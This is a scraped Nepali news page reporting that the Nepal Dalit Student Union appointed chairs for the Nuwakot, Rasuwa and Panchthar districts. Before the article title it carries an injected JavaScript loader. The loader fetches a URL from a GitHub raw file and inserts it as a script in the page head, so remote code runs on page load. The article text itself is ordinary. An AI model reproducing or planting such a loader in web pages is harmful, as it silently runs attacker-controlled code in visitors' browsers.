;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); तिन जिल्लाको अध्यक्ष मनोनित गर्यो नेपाल दलित बिधार्थी संघले – जुनेली न्युज
बुधबार, बैशाख ४, २०८२
  • होमपेज
  • तिन जिल्लाको अध्यक्ष मनोनित गर्यो नेपाल दलित बिधार्थी संघले
राजनीति

तिन जिल्लाको अध्यक्ष मनोनित गर्यो नेपाल दलित बिधार्थी संघले

२५  चैत,

काठमाडौँ | नेपाल दलित बिधार्थी संघले ७७ वटै जिल्लामा संगठन बिस्तार गर्ने क्रममा आज तिन ओटा जिल्लाको अध्यक्ष मनोनित गरेको छ | मनोनित हुनेहरुमा नुवाकोट जिल्लाबाट दिपक गैरे मिजार, रसुवा जिल्लाबाट हिमाल नेपाली र पाँचथर जिल्लाबाट सबिन रामदाम मनोनित भएका छन् |

नेपाल दलित विद्यार्थी संघका केन्द्रिय अध्यक्ष राजु सुनारले पत्र काटी मनोनित गरेका हुन ।

नेपाल दलित संघ चैथो महाधिबेशन पश्चात नेपाल दलित बिधार्थी संघको विधानको धारा १८ को (२) बमोजिम गठित नेपाल दलित विद्यार्थी  संघको बिधान अनुसार उपाध्यक्ष मनोनित गरिएको हो |

केन्द्रीय अध्यक्ष राजु सुनार भन्छन्: छिट्टै महाधिबेसन गर्ने कुरामा पुरै समिति जुटेको छ।

फेसबुक प्रतिक्रियाहरु